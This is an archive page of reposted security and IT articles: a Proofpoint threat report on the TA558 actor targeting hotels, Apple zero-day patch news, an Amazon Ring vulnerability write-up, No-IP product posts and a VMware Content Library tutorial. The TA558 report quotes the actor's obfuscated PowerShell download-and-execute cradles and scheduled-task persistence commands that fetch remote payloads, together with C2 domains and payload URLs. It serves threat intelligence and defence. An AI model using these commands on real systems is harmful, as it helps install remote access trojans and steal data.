hardware Archives - Page 34 of 37 - Appunti dalla rete

Reservations Requested: TA558 Targets Hospitality and Travel

Key Findings:

TA558 is a likely financially motivated small crime threat actor targeting hospitality, hotel, and travel organizations.
Since 2018, this group has used consistent tactics, techniques, and procedures to attempt to install a variety of malware including Loda RAT, Vjw0rm, and Revenge RAT.
TA558’s targeting focus is mainly on Portuguese and Spanish speakers, typically located in the Latin America region, with additional targeting observed in Western Europe and North America.
TA558 increased operational tempo in 2022 to a higher average than previously observed.
Like other threat actors in 2022, TA558 pivoted away from using macro-enabled documents in campaigns and adopted new tactics, techniques, and procedures.

Overview

Since 2018, Proofpoint has tracked a financially-motivated cybercrime actor, TA558, targeting hospitality, travel, and related industries located in Latin America and sometimes North America, and western Europe. The actor sends malicious emails written in Portuguese, Spanish, and sometimes English. The emails use reservation-themed lures with business-relevant themes such as hotel room bookings. The emails may contain malicious attachments or URLs aiming to distribute one of at least 15 different malware payloads, typically remote access trojans (RATs), that can enable reconnaissance, data theft, and distribution of follow-on payloads.

Proofpoint tracked this actor based on a variety of email artifacts, delivery and installation techniques, command and control (C2) infrastructure, payload domains, and other infrastructure.

In 2022, Proofpoint observed an increase in activity compared to previous years. Additionally, TA558 shifted tactics and began using URLs and container files to distribute malware, likely in response to Microsoft announcing it would begin blocking VBA macros downloaded from the internet by default.

TA558 has some overlap with activity reported by Palo Alto Networks in 2018, Cisco Talos in 2020 and 2021, Uptycs in 2020, and HP in 2022. This report is the first comprehensive, public report on TA558, detailing activity conducted over four years that is still ongoing. The information used in the creation of this report is based on email campaigns, which are manually contextualized, and analyst enriched descriptions of automatically condemned threats.

Campaign Details and Activity Timeline

2018

Proofpoint first observed TA558 in April 2018. These early campaigns typically used malicious Word attachments that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) or remote template URLs to download and install malware. Two of the most common malware payloads included Loda and Revenge RAT. Campaigns were conducted exclusively in Spanish and Portuguese and targeted the hospitality and related industries, with “reserva” (Portuguese word for “reservation”) themes. Example campaign:

Subject: Corrigir data da reserva para o dia 03

Attachment: Booking – Dados da Reserva.docx

Attachment “Author”: C.D.T Original

SHA256: 796c02729c9cd5d37976ddae205226e6339b64859e9980d56cbfc5f461d00910

Figure 1: Example TA558 email from 2018

The documents leveraged remote template URLs to download an additional RTF document, which then downloaded and installed Revenge RAT. Interestingly, the term “CDT” is in the document metadata and in the URL. This term, which may refer to a travel organization, appears throughout TA558 campaigns from 2018 to present.

RTF payload URL example:

hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc

2019

In 2019, this actor continued to leverage emails with Word documents that exploited Equation Editor vulnerabilities (e.g. CVE-2017-11882) to download and install malware. TA558 also began using macro-laden PowerPoint attachments and template injection with Office documents. This group expanded their malware arsenal to include Loda, vjw0rm, Revenge RAT, and others. In 2019, the group began occasionally expanding targeting outside of the hospitality and tourism verticals to include business services and manufacturing. Example campaign:

Subject: RESERVA

Attachment: RESERVA.docx

Attachment “Author”: msword

Attachment “Last Saved By”: Richard

SHA256: 7dc70d023b2ee5a941edd925999bb6864343b11758c7dc18309416f2947ddb6e

Figure 2: Example TA558 email from 2019

Figure 3: Example TA558 Microsoft Word attachment from 2019

The documents leveraged a remote template relationship URL to download an additional RTF document. The RTF document (Author: obidah qudah, Operator: Richard) exploited the CVE-2017-11882 vulnerability to retrieve and execute an MSI file. Upon execution, the MSI file extracted and ran Loda malware.

In December 2019, Proofpoint analysts observed TA558 begin to send English-language lures relating to room bookings in addition to Portuguese and Spanish.

2020

In 2020, TA558 stopped using Equation Editor exploits and began distributing malicious Office documents with macros, typically VBA macros, to download and install malware. This group continued to use a variety of malware payloads including the addition of njRAT and Ozone RAT.

Hotel, hospitality, and travel organization targeting continued. Although the actor slightly increased its English-language operational tempo throughout 2020, most of the lures featured Portuguese and Spanish reservation requests. An example of a common attack chain in 2020:

From: Oab Brasil <fernando1540@bol[.]com[.]br>

Subject: Orçamento Conferencistas – 515449939

Attachment: reserva.ppa

SHA256: c2b817b02e56624c8ed7944e76a3896556dc2b7482f747f4be88f95e232f9207

Figure 4: Example TA558 email from 2020

The message contained a PowerPoint attachment that used template injection techniques and VBA macros which, if enabled, executed a PowerShell script to download a VBS payload from an actor-controlled domain. The VBS script in turn downloaded and executed Revenge RAT.

Figure 5: 2020 attack path example

TA558 was more active in 2020 than previous years and 2021, with 74 campaigns identified. 2018, 2019, and 2021 had 9, 70, and 18 total campaigns, respectively. So far in 2022, Proofpoint analysts have observed 51 TA558 campaigns.

Figure 6: Total number of TA558 campaigns over time

2021

In 2021, this actor continued to leverage emails with Office documents containing macros or Office exploits (e.g. CVE-2017-8570) to download and install malware. Its most consistently used malware payloads included vjw0rm, njRAT, Revenge RAT, Loda, and AsyncRAT.

Additionally, this group started to include more elaborate attack chains in 2021. For example, introducing more helper scripts and delivery mechanisms such as embedded Office documents within MSG files.

In this example 2021 campaign, emails purported to be, e.g.:

From: Financeiro UNIMED <financeiro@unimed-corporated[.]com>

Subject: Reserva

Replyto: cdt[name]cdt@gmail[.]com

Attachment: OficioCircularencaminhadoaoSetorFinanceiroUNIMED.docx

SHA256: 2f0f99cbac828092c0ec23e12ecb44cbf53f5a671a80842a2447e6114e4f6979

Emails masqueraded as Unimed, a Brazilian medical work cooperative and health insurance operator. These messages contained Microsoft Word attachments with macros which, if enabled, invoked a series of scripts to ultimately download and execute AsyncRAT.

Figure 7: Example TA558 email from 2021

Of note is the repeat use of the string “CDT” contained the replyto email address and C2 domain names.

AsyncRAT C2 domains:

warzonecdt[.]duckdns[.]org

cdt2021.zapto[.]org

Example PowerShell execution to download and execute AsyncRAT:

$NOTHING = ‘(Ne<^^>t.We’.Replace(‘<^^>’,’w-Object

Ne’);$alosh=’bC||||||!@!@nlo’.Replace(‘||||||!@!@’,’lient).Dow’); $Dont=’adString(”hxxps[:]//brasilnativopousada[.]com[.]br/Final.txt”)

‘;$YOUTUBE=IEX ($NOTHING,$alosh,$Dont -Join ”)|IEX

Persistence was achieved through a scheduled task masquerading as a Spotify service.

schtasks /create /sc MINUTE /mo 1 0 /tn "Spotfy" /tr
 "\"%windir%\system32\mshta.exe\"hxxps[:]//www[.]unimed-
corporated[.]com/microsoft.txt" /F

This was the actor’s least active year. Proofpoint observed just 18 campaigns conducted by TA558 in 2021.

2022

In 2022, campaign tempo increased significantly. Campaigns delivered a mixture of malware such as, Loda, Revenge RAT, and AsyncRAT. This actor used a variety of delivery mechanisms including URLs, RAR attachments, ISO attachments, and Office documents.

TA558 followed the trend of many threat actors in 2022 and began using container files such as RAR and ISO attachments instead of macro-enabled Office documents. This is likely due to Microsoft’s announcements in late 2021 and early 2022 about disabling macros by default in Office products, which caused a shift across the threat landscape of actors adopting new filetypes to deliver payloads.

Additionally, TA558 began using URLs more frequently in 2022. TA558 conducted 27 campaigns with URLs in 2022, compared to just five campaigns total from 2018 through 2021. Typically, URLs led to container files such as ISOs or zip files containing executables.

Figure 8: Campaigns using specific threat types over time

For example, this 2022 Spanish language campaign featured URLs leading to container files. Messages purported to be, e.g.:

From: Mauricio Fortunato <contato@155hotel[.]com[.]br>

Subject: Enc: Reserva Familiar

The URL purported to be a legitimate 155 Hotel reservation link that led to an ISO file and an embedded batch file. The execution of the BAT file led to a PowerShell helper script that downloaded a follow-on payload, AsyncRAT.

Similar to earlier campaigns, persistence was achieved via a scheduled task:

schtasks /create /sc MINUTE /mo 1 /tn Turismo /F /tr
"powershell -w h -NoProfile -ExecutionPolicy Bypass -
Command start-sleep -s 20;iwr ""\""hxxps[:]//unimed-
corporated[.]com/tur/turismo[.]jpg""\"" -useB|iex;"

Figure 9: 2022 campaign example chain.

In April 2022 Proofpoint researchers spotted a divergence from the typical email lure. One of the campaigns included a QuickBooks invoice email lure. Additionally, this campaign included the distribution of RevengeRAT which had not been observed in use by TA558 since December 2020. Messages purported to be:

From: Intuit QuickBooks Team <quickbooks@unimed-corporated.com>

Subject: QuickBooks Invoice 1000172347

Attachment: 1000172347.xlsm

SHA256: b57a9f7321216c3410ebcc9d4b09e73a652dee9e750f96b2f6d7d1e39e2923d6

The emails contained Excel attachments with macros that downloaded helper scripts via PowerShell and MSHTA. The execution of helper scripts ultimately led to the installation of RevengeRAT. Proofpoint has not seen this theme since April, and it is unclear why TA558 temporarily pivoted away from reservations themes.

Malware Use

Since 2018, TA558 has used at least 15 different malware families, sometimes with overlapping command and control (C2) domains. The most frequently observed payloads include Loda, Vjw0rm, AsyncRAT, and Revenge RAT.

Figure 10: Number of TA558 campaigns by malware type over time

Typically, TA558 uses attacker owned and operated infrastructure. However, Proofpoint has observed TA558 leverage compromised hotel websites to host malware payloads, thus adding legitimacy to its malware delivery and C2 traffic.

Language Use

Since Proofpoint began tracking TA558 through 2022, over 90% of campaigns were conducted in Portuguese or Spanish, with four percent featuring multiple language lure samples in English, Spanish, or Portuguese.

Figure 11: Campaign totals by language since 2018

Interestingly, the threat actor often switches languages in the same week. Proofpoint researchers have observed this actor send, for example, a campaign in English and the following day another campaign in Portuguese. Individual targeting typically differs based on campaign language.

Notable Campaign Artifacts

In addition to the consistent lure themes, targeting, message content, and malware payloads, Proofpoint researchers observed TA558 using multiple notable patterns in campaign data including the use of certain strings, naming conventions and keywords, domains, etc. For example, the actor appears to repeat the term CDT in email and malware attributes. This may relate to the CDT Travel organization and related travel reservation lure themes. Proofpoint researchers observed TA558 use the CDT term in dozens of campaigns since 2018, in C2 domains, replyto email addresses, payload URLs, scheduled task name, and Microsoft Office document metadata (i.e., Author, Last Saved By), and Microsoft Office macro language.

Throughout many of the 2019 and 2020 campaigns the threat actor used various URLs from the domain sslblindado[.]com to download either helper scripts or malware payloads. Some examples include:

microsofft[.]sslblindado[.]com
passagensv[.]sslblindado[.]com
system11[.]sslblindado[.]com

Like other threat actors, this group sometimes mimics technology service names to appear legitimate. For example, using terms in payload URLs or C2 domain names. Some examples include:

microsofft[.]sslblindado[.]com
firefoxsystem[.]sytes[.]net
googledrives[.]ddns[.]net

Another interesting pattern observed were common strings like “success” and “pitbull”. In several campaigns Proofpoint researchers spotted these strings in C2 domains. Some examples include:

successfully[.]hopto[.]org
success20[.]hopto[.]org
4success[.]zapto[.]org

From 2019 through 2020, TA558 conducted 10 campaigns used the keyword “Maringa” or “Maaringa” in payload URLs or email senders. Maringa is a city in Brazil. Examples include:

maringareservas[.]com[.]br/seila[.]rtf
maringa[.]turismo@system11[.]com[.]br

Possible Objectives

Proofpoint has not observed post-compromise activity from TA558. Based on the observed payloads, victimology, and campaign and message volume, Proofpoint assesses with medium to high confidence that this is a financially motivated cybercriminal actor.

The malware used by TA558 can steal data including hotel customer user and credit card data, allow lateral movement, and deliver follow-on payloads.

Open-source reporting provides insight into one possible threat actor objective. In July, CNN Portugal reported a Portuguese hotel’s website was compromised, and the actor was able to modify the website and direct customers to a fake reservation page. The actor stole funds from potential customers by posing as the compromised hotel. Although Proofpoint does not associate the identified activity with TA558, it provides an example of possible follow-on activity and the impacts to both target organizations and their customers if an actor is able to compromise hotel or transportation entities.

Conclusion

TA558 is an active threat actor targeting hospitality, travel, and related industries since 2018. Activity conducted by this actor could lead to data theft of both corporate and customer data, as well as potential financial losses.

Organizations, especially those operating in targeted sectors in Latin America, North America, and Western Europe should be aware of this actor’s tactics, techniques, and procedures.

Indicators of Compromise (IOCs)

The following IOCs represent a sample of indicators observed by Proofpoint researchers associated with TA558.

C2 Domains

Indicator	Description	Date Observed
quedabesouro[.]ddns[.]net	RevengeRAT C2 Domain	2018
queda212[.]duckdns[.]org	njRAT/RevengeRAT C2 Domain	2018
3030pp[.]hopto[.]org	vjw0rm C2 Domain	2018 and 2019
vemvemserver[.]duckdns[.]org	Houdini/Loda C2 Domain	2019
4success[.]zapto[.]org	Loda C2 Domain	2019
success20[.]hopto[.]org	Loda C2 Domain	2020
msin[.]hopto[.]org	Loda C2 Domain	2021 and 2022
cdtpitbull[.]hopto[.]org	AsyncRAT C2 Domain	2021 and 2022
111234cdt[.]ddns[.]net	njRAT/AsyncRAT C2 Domain	2021 and 2022
cdt2021[.]zapto[.]org	AsyncRAT C2 Domain	2021 and 2022
38[.]132[.]101[.]45	RevengRAT C2 IP	2022

Payload URLs

Indicator	Description	Date Observed
hxxp[://]cdtmaster[.]com[.]br/DadosDaReserva[.]doc	RTF payload URL	2018
hxxp[://]hypemediardf[.]com[.]pl/css/css[.]doc	Loda Payload URL	2019
hxxps[:]//brasilnativopousada[.]com[.]br/Final[.]txt	AsyncRAT Payload URL	2021
hxxps[:]//www[.]unimed-corporated[.]com/microsoft[.]txt	AsyncRAT Scheduled Task URL	2021
hxxps[:]//unimed-corporated[.]com/tur/turismo[.]jpg	AsyncRAT Scheduled Task URL	2022

ET Signatures

ETPRO MALWARE Loda Logger CnC Activity

ETPRO TROJAN MSIL/Revenge-RAT Keep-Alive Activity (Outbound)

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M2

ETPRO TROJAN MSIL/Revenge-RAT CnC Checkin M4

ETPRO TROJAN njRAT/Bladabindi Variant CnC Activity (inf)

ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (act)

ETPRO TROJAN Generic njRAT/Bladabindi CnC Activity (inf)

ET TROJAN Bladabindi/njRAT CnC Command (ll)

Source :
https://www.proofpoint.com/us/blog/threat-insight/reservations-requested-ta558-targets-hospitality-and-travel

Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities

Apple on Wednesday released security updates for iOS, iPadOS, and macOS platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices.

The list of issues is below –

CVE-2022-32893 – An out-of-bounds issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content
CVE-2022-32894 – An out-of-bounds issue in the operating system’s Kernel that could be abused by a malicious application to execute arbitrary code with the highest privileges

Apple said it addressed both the issues with improved bounds checking, adding it’s aware the vulnerabilities “may have been actively exploited.”

The company did not disclose any additional information regarding these attacks or the identities of the threat actors perpetrating them, although it’s likely that they were abused as part of highly-targeted intrusions.

The latest update brings the total number of zero-days patched by Apple to six since the start of the year –

CVE-2022-22587 (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
CVE-2022-22620 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-22674 (Intel Graphics Driver) – An application may be able to read kernel memory
CVE-2022-22675 (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges

Both the vulnerabilities have been fixed in iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

Update: Apple on Thursday released a security update for Safari web browser (version 15.6.1) for macOS Big Sur and Catalina to patch the WebKit vulnerability fixed in macOS Monterey.

Source :
https://thehackernews.com/2022/08/apple-releases-security-updates-to.html

New Amazon Ring Vulnerability Could Have Exposed All Your Camera Recordings

Retail giant Amazon patched a high-severity security issue in its Ring app for Android in May that could have enabled a rogue application installed on a user’s device to access sensitive information and camera recordings.

The Ring app for Android has over 10 million downloads and enables users to monitor video feeds from smart home devices such as video doorbells, security cameras, and alarm systems. Amazon acquired the doorbell maker for about $1 billion in 2018.

Application security firm Checkmarx explained it identified a cross-site scripting (XSS) flaw that it said could be weaponized as part of an attack chain to trick victims into installing a malicious app.

The app can then be used to get hold of the user’s Authorization Token, that can be subsequently leveraged to extract the session cookie by sending this information alongside the device’s hardware ID, which is also encoded in the token, to the endpoint “ring[.]com/mobile/authorize.”

Armed with this cookie, the attacker can sign in to the victim’s account without having to know their password and access all personal data associated with the account, including full name, email address, phone number, and geolocation information as well as the device recordings.

https://youtube.com/watch?v=eJ5Qsx4Fdks

This is achieved by querying the below two endpoints –

account.ring[.]com/account/control-center – Get the user’s personal information and Device ID
account.ring[.]com/api/cgw/evm/v2/history/devices/{{DEVICE_ID}} – Access the Ring device data and recordings

Checkmarx said it reported the issue to Amazon on May 1, 2022, following which a fix was made available on May 27 in version 3.51.0. There is no evidence that the issue has been exploited in real-world attacks, with Amazon characterizing the exploit as “extremely difficult” and emphasizing that no customer information was exposed.

The development comes more than a month after the company moved to address a severe weakness affecting its Photos app for Android that could have been exploited to steal a user’s access tokens.

Source :
https://thehackernews.com/2022/08/new-amazon-ring-vulnerability-could.html

What are the Benefits of Adding an SSL Certificate to Your No-IP Free, Enhanced or Plus Hostname?

SSL Certificates are a great way to increase the security of your hostname because they add an extra layer of security for you and anyone that visits your hostname. Learn the benefits of adding an SSL Certificate to your Free, Enhanced Dynamic DNS or Plus Managed DNS hostname.

What is an SSL Certificate?
SSL stands for Secure Socket Layer. This means that your hostname is given a secure connection between it, the Internet browser, and the webserver. This allows websites to transmit private data online, without the worry of it being stolen. You can tell when a website has an SSL certificate enabled, when the HTTP in the URL ends with an S, making it an HTTPS. Example: https://www.noip.com.

What are the advantages of adding an SSL Certificate to your Free, Enhanced Dynamic DNS or Plus Managed DNS hostname?

Encryption and Verification

This is the biggest benefit of adding an SSL certificate to your hostname. The extra layer of encryption shows that your hostname is safe for people to visit. All of your visitor’s data will now be transmitted over an encrypted connection to the hostname and others won’t be able to see what is being sent.

The SSL Certificate also checks that the information it receives is coming from the expected domain. So, if your customer sends personal or private information, the SSL Certificate guarantees it is being sent to the secure site, and not to a potentially malicious one.

Ensures Data Integrity

A website that doesn’t have an SSL Certificate enabled sends data in a plain text format. This means that all of the data that is being sent between the server and the browser can be easily read. If a hacker were to gain access to your domain and then change the information being presented on your hostname, this is an example of domain spoofing.

Domain spoofing happens when a hacker gains access to the information on a website and then changes it before it gets sent to the browser for the user. When this happens, the user is typically not even aware they are visiting a compromised website. When an SSL certificate is enabled on the hostname, this becomes much harder as the data is not sent in plain text, but is sent in an encrypted, unreadable format.

Gains Your Users Trust

When you use an SSL Certificate, your hostname shows up with an HTTPS and a lock icon, signifying the hostname is secure. This helps users feel safe when they are on your hostname and makes them feel comfortable if you are asking them to enter sensitive information, like credit cards, or Social Security numbers.

Our Free Dynamic DNS, Enhanced Dynamic DNS and Plus Managed DNS accounts both come with 1 Free TrustCor Standard DV SSL Certificate. Additional SSL Certificates can be purchased and start at just $19.99 per year. You can learn more about each SSL Certificate and how you can add one today here.

Source :
https://www.noip.com/blog/2022/02/22/benefits-adding-ssl-certificate-ip-free-enhanced-hostname/

New Feature Alert : No-IP Announces Two-Factor Authentication

We are so excited to announce the release of Two-Factor Authentication (2FA). This new feature helps keep our customers’ accounts secure by ensuring that only authorized people are able to access accounts. This helps limit the impact of malicious activity because it adds another layer of security on top of your password.

Why Two-Factor Authentication?

You may be wondering why No-IP added 2FA as a security feature, or even how 2FA is different from our current login policy. 2FA is one of the highest levels of security that can be implemented to ensure customer accounts remain secure. 2FA is a security practice that requires you to verify your identity using multiple forms of account verification.

When 2FA is enabled, you will log in with the same username and password, but you will be required to enter a time-based one-time password (TOTP) pin from an authenticator app of your choice on your smartphone.

It is more important than ever to enable data security measures like 2FA whenever possible. As threats like password breaches, keylogging, and other security threats are becoming a normal thing, 2FA is an added layer of account protection.

What are the Benefits of Two-Factor Authentication?

Additional layer of security on account login
2FA requires users to identify themselves through additional verification measures, this helps protect accounts from theft. Making it so a password alone isn’t enough to authenticate a login. Lately, major password breaches across all industries happen so often that even a very secure password can be breached. 2FA adds another layer of security to help reduce this risk.
Identity Protection
Identity theft and data breaches are all too common lately. 2FA ensures that if your username or password were ever leaked, your account is still protected by an additional layer of authentication.
Compliance
Many of our customers work in industries like the Government and Health Industries that require extra compliance for third-party accounts.
Effective Cybersecurity Solution
2FA is an effective strategy to keep accounts safe because it is difficult for hackers to crack both a password and have access to the 2FA device.
Easy Implementation
We have made enabling and using 2FA simple and easy by offering authentication using TOTP, which is supported by various smartphone apps. You choose the one that works best for you.

How Do I Enable 2FA On My No-IP Account?

Login to your No-IP account, you can then find the 2FA option within your No-IP account under “Account” and then click ”Security”.

The first step is to choose which authentication app you will use. We suggest using Authy, Duo, LastPass Authenticator, or 1Password. However, any 2FA application app that supports TOTP will work. You will then need to download and install whichever authentication app you choose.

After you have downloaded your authentication app, you will need to follow the steps for that certain app to finish the configuration process and fully activate 2FA. Please ensure that you keep your Recovery Codes in a safe place, so you can always get back into your account.

The following Knowledge Base Guides will help you configure 2FA on your No-IP account for the specific apps listed below. Consult your application’s documentation for support with other TOTP authentication apps.

Authy

Duo

LastPass Authenticator

1Password

What 2FA applications does No-IP Support?

Any 2FA application that works with TOTP will work with No-IP’s 2FA.

Does No-IP Require 2FA?

While we don’t currently require No-IP accounts to have 2FA enabled, we strongly suggest that you enable it. 2FA is a simple solution to help keep your No-IP account secure.

What Happens If I Lose Access To My Two-Factor Authentication App?

When you set up 2FA you will be provided with ten, one-time-use recovery codes that allow you to get into your account without needing to enter your TOTP code. Each code can only be used one time. If you lose your backup codes and your authentication app, you will no longer be able to access your account. Keep these codes in a safe and secure spot that only you have access to.

If I have 2FA set up, do I need an account Security Question?

Yes, if you ever need to contact No-IP Customer Support. we will need to verify you. One way of verification is by answering your security question. If you cannot verify your account, we will not be able to assist you.

Will you provide other factors of authentication besides TOTP and Recovery Codes?
For now, we are monitoring the usage of TOTP. However, we’re open to adding additional factors dependent on customer feedback.

Does My Dynamic Update Client (DUC) or Other Update Device Require Two-Factor Authentication When Logging In or Sending Dynamic IP Updates?

No, 2FA will only be prompted on our website at this time. We are currently working on separating the Dynamic Update Client credentials from dynamic updates completely. If you want to use different credentials other than your login, you can set up sub-account groups.

Source :
https://www.noip.com/blog/2022/02/22/new-feature-alert-ip-announces-two-factor-authentication/

Manage resources across sites with the VMware Content Library

A VMware vSphere environment includes many components to deliver business-critical workloads and services. However, there is a feature of today’s modern VMware vSphere infrastructure that is arguably underutilized – the VMware Content Library. Nevertheless, it can be a powerful tool that helps businesses standardize the workflow using files, templates, ISO images, vApps, scripts, and other resources to deploy and manage virtual machines. So how can organizations manage resources across sites with the VMware Content Library?

What is the VMware Content Library?

Most VI admins will agree with multiple vCenter Servers in the mix, managing files, ISOs, templates, vApps, and other resources can be challenging. For example, have you ever been working on one cluster and realized you didn’t have the ISO image copied to a local datastore that is accessible, and you had to “sneakernet” the ISO where you could mount and install it? What about virtual machine templates? What if you want to have the virtual machine templates in one vCenter Server environment available to another vCenter Server environment?

The VMware Content Library is a solution introduced in vSphere 6.0 that allows customers to keep their virtual machine resources synchronized in one place and prevent the need for manual updates to multiple templates and copying these across between vCenter Servers. Instead, administrators can create a centralized repository using the VMware Content Library from which resources can be updated, shared, and synchronized between environments.

Using the VMware Content Library, you essentially create a container that can house all of the important resources used in your environment, including VM-specific objects like templates and other files like ISO image files, text files, and other file types.

The VMware Content Library stores the content as a “library item.” Each VMware Content Library can contain many different file types and multiple files. VMware gives the example of the OVF file that you can upload to your VMware Content Library. As you know, the OVF file is a bundle of multiple files. However, when you upload the OVF template, you will see a single library entry.

VMware has added some excellent new features to the VMware Content Library features in the past few releases. These include the ability to add OVF security policies to a content library. The new OVF security policy was added in vSphere 7.0 Update 3. It allows implementing strict validation for deploying and updating content library items and synchronizing templates. One thing you can do is make sure a trusted certificate signs the templates. To do this, you can deploy a signing certificate for your OVFs from a trusted CA to your content library.

Another recent addition to the VMware Content Library functionality introduced in vSphere 6.7 Update 1 is uploading a VM template type directly to the VMware Content Library. Previously, VM templates were converted to an OVF template type. Now, you can work directly with virtual machine templates in the VMware Content Library.

VMware Content Library types

VMware Content Library enables managing resources across sites using two different types of content libraries. These include the following:

Local Content Library – A local content library is a VMware Content Library used to store and manage content residing in a single vCenter Server environment. Suppose you work in a single vCenter Server environment and want to have various resources available across all your ESXi hosts to deploy VMs, vAPPs, install from ISO files, etc. In that case, the local content library allows doing that. With the local content library, you can choose to Publish the local content library. When you publish the Content Library, you are making it available to be subscribed to or synchronized.

Subscribed Content Library – The other type of Content Library is the subscribed content library. When you add a subscribed VMware Content Library type, you are essentially downloading published items from a VMware Content Library type that has published items as mentioned in the Local Content Library section. In this configuration, you are only a consumer of the VMware Content Library that someone else has published. It means when creating the Content Library, the publish option was configured. You can’t add templates and other items to the subscribed VMware Content Library type as you can only synchronize the content of the subscribed Content Library with the content of the published Content Library.
- With a subscribed library, you can choose to download all the contents of the published Content Library immediately once the subscribed Content Library is created. You can also choose to download only the metadata for items in the published Content Library and download the entire contents of the items you need. You can think of this as a “files on-demand” type feature that only downloads the resources when these are required.

Below is an example of the screen when configuring a content library that allows creating either a Local Content Library or the Subscribed Content Library:

Choosing the content library type

Create a local or subscription Content Library in vSphere 7

Creating a new VMware Content Library is a relatively straightforward and intuitive process you can accomplish in the vSphere Client. Let’s step through the process to create a new VMware Content Library. We will use the vSphere Web Client to manage and configure the Content Library Settings.

Using the vSphere Web Client to manage the Content Library

First, click the upper left-hand “hamburger” menu in the vSphere Client. You will see the option Content Libraries directly underneath the Inventory menu when you click the menu.

Choosing the Content Libraries option to create a manage Content Libraries

Under the Content Libraries screen, you can Create new Content Libraries.

Creating a new Content Library in the vSphere Client

It will launch the New Content Library wizard. In the Name and Location screen, name the new VMware Content Library.

New Content Library name and location

On the Configure content library step, you configure the content library type, including configuring a local content library or a subscribed content library. Under the configuration for Local content library, you can Enable publishing. If publishing is enabled, you can also enable authentication.

Configuring the Content Library type

When you configure publishing and authentication, you can configure a password on the content library.

Step 3 is the Apply security policy step. It allows applying the OVF default policy to protect and enforce strict validation while importing and synchronizing OVF library items.

Choosing to apply the OVF default policy

The VMware Content Library needs to have a storage location that will provide the storage for the content library itself. First, select the datastore you want to use for storing your content library. The beauty of the content library is that it essentially publishes and shares the items in the content library itself, even though they may be housed on a particular datastore.

Select the storage to use for storing items in the VMware Content Library

Finally, we are ready to complete the creation of the Content Library. Click Finish.

Finishing the creation of the VMware Content Library

Once the VMware Content Library is created, you can see the details of the library, including the Publication section showing the Subscription URL.

Viewing the settings of a newly created VMware Content Library

As a note. If you click the Edit Settings hyperlink under the Publication settings pane, you can go in and edit the settings of the Content Library, including the publishing options, authentication, changing the authentication password, and applying a security policy.

Editing the settings of a VMware Content Library

Creating a subscribed VMware Content Library

As we mentioned earlier, configuring a subscribed content library means synchronizing items from a published content library. In the New Content Library configuration wizard, you choose the Subscribed content library option to synchronize with a published content library. Then, enter the subscription URL for the published content library when selected. As shown above, this URL is found in the settings of the published content library.

You will need to also place a check in the Enable authentication setting if the published content library was set up with authentication. Then, enter the password configured for the published content library. Also, note the configuration for downloading content. As detailed earlier, you can choose to synchronize items immediately, meaning the entire content library will be fully downloaded. Or, you can select when needed, which acts as a “files on demand” configuration that only downloads the resources when needed.

Configuring the subscribed content library

Choose the storage for the subscribed Content Library.

Add storage for the subscribed VMware Content Library

Ready to complete adding a new subscribed VMware Content Library. Click Finish.

Ready to complete adding a subscribed VMware Content Library

Interestingly, you can add a subscribed VMware Content Library that is subscribed to the same published VMware Content Library on the same vCenter Server.

Published and subscribed content library on the same vCenter Server

What is Check-In/Check-Out?

A new feature included with VMware vSphere 7 is versioning with the VMware Content Library. So often, with virtual machine templates, these are frequently changed, updated, and configured. As a result, it can be easy to lose track of the changes made, the user making the modifications, and track the changes efficiently.

Now, VMware vSphere 7 provides visibility into the changes made to virtual machine templates with a new check-in/check-out process. This change embraces DevOps workflows with a way for IT admins to check in and check out virtual machine templates in and out of the Content Library.

Before the new check-in/check-out feature, VI admins might use a process similar to the following to change a virtual machine template:

Convert a virtual machine template to a virtual machine
Place a snapshot on the converted template to machine VM
Make whatever changes are needed to the VM
Power the VM off and convert it back to a template
Re-upload the VM template back to the Content Library
Delete the old template
Internally notify other VI admins of the changes

Now, VI admins can use a new capability in vSphere 7.0 and higher to make changes to virtual machine templates more seamlessly and track those changes effectively.

Clone as template to Library

The first step is to house the virtual machine template in the Content Library. Right-click an existing virtual machine to use the new functionality and select Clone as Template to Library.

Clone as Template to Library functionality to use the check-in and check-out feature

As a note, if you see the Clone to Library functionality instead of Clone as Template to Library, it means you have not converted the VM template to a virtual machine. If you right-click a VM template, you only get the Clone to Library option. If you select Clone to Template, it only allows cloning the template in a traditional way to another template on a datastore.

Right-clicking and cloning a VM template only gives the option to Clone to Library

Continuing with the Clone to Library process, you will see the Clone to Template in Library dialog box open. Select either New template or Update the existing template.

Clone to Template in Library

In the vCenter Server tasks, you will see the process begin to Upload files to a Library and Transfer files.

Uploading a virtual machine template to the Content Library

When you right-click a virtual machine and not a virtual machine template, you will see the additional option of Clone as Template to Library.

Clone as Template to Library

It then brings up a more verbose wizard for the Clone Virtual Machine To Template process. The first screen is the Basic information where you define the Template type (can be OVF or VM Template), the name of the template, notes, and select a folder for the template.

Configuring basic information for the clone virtual machine to template process

On the Location page, you select the VMware Content Library you want to use to house the virtual machine template.

Select the VMware Content Library to house the virtual machine template

Select a compute resource to house your cloned VM template.

Select the compute resource for the virtual machine template

Select the storage for the virtual machine template.

Select storage to house the VM template

Finish the Clone Virtual Machine to Template process.

Finish the clone of the virtual machine to template in the VMware Content Library

If you navigate to the Content Library, you will see the template listed under the VM Templates in the Content Library.

Viewing the VM template in the Content Library

Checking templates in and out

If you select the radio button next to the VM template, the Check Out VM From This Template button will appear to the right.

Launching the Check out VM from this template

When you click the button, it will launch the Check out VM from VM Template wizard. First, name the new virtual machine that will be created in the check-out process.

Starting the Check out VM from VM template

Select the compute resource to house the checked-out virtual machine.

Selecting a compute resource

Review and finish the Check out VM from VM template process. You can select to power on VM after check out.

Review and Finish the Check out VM from VM Template

The checked-out virtual machine will clone from the existing template in the Content Library. Also, you will see an audit trail of the check-outs from the Content Library. You are directed to Navigate to the checked-out VM to make updates. Note you then have the button available to Check In VM to Template.

Virtual machine template is checked out and deployed as a virtual machine in inventory

